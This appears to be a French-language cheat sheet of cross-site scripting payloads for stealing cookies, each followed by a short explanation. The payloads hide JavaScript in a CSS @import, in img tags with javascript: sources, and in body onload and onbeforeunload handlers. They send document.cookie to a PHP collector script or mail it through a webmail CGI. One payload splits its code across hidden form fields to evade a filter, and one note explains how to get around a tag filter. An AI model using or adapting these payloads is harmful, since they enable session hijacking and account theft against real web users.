<link rel="StyleSheet" type="text/css" href="http://www.multimania.com/login/code.css">
> balise de feuille de style CSS récupérée sur un site complice

code.css :
@import url(javascript:lol = new Image());
@import url(javascript:lol.src = "http://www.multimania.com/login/recup.php?data="+document.cookie);
> script CSS lançant du javascript et envoyant le cookie vers un script php

recup.php:
> script enregistrant/mailant la variable "data"

<img bx=">" src="javascript:lol = new Image(); lol.src='http://www30.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=n00b@null&SUBJECT=:)&BODY='+ window.document.cookie +'&TARGETACTION=NONE';" width=0>
script qui joue sur le fait que le filtre considérait la balise <img fermée, lorsque le signe > appraissait (tout ce qui suit n'était pas considéré)

<img src="javascript:window.location.href='http://www21.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=n00b@null&SUBJECT=:)&BODY=' + window.document.cookie + '&TARGETACTION=NONE';" width=0>
comme le premier script, simplement dissimulé dans une image : lorsque le navigateur va chercher l'adresse, le script s'execute

<body onunload="relpubloc()" onbeforeunload="eval(lol.url1.value+lol.url2.value);">
<form name=lol>
<input type=hidden name="url1" value=" lol = new Image(); lol.src='http://www30.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MA">
<input type=hidden name="url2" value="ILTO=n00b@null&SUBJECT=:-)&BODY='+ window.document.cookie +'&TARGETACTION=NONE';">
</form>

<body ONLOAD="window.location='http://www30.caramail.com/cgi-bin/SelectAction?DEALIAS=0&MAILTO=n00b@null&SUBJECT=:-)&BODY=' + window.document.cookie + '&TARGETACTION=NONE';">
un des premiers script: la balise demande, au chargement de la page, de changer d'adresse et de se diriger vers le script d'envoi du e-mail. les données sont postées, pour que le e-mail soit envoyé à l'adresse définie et le cookie est inséré, dans le corps du message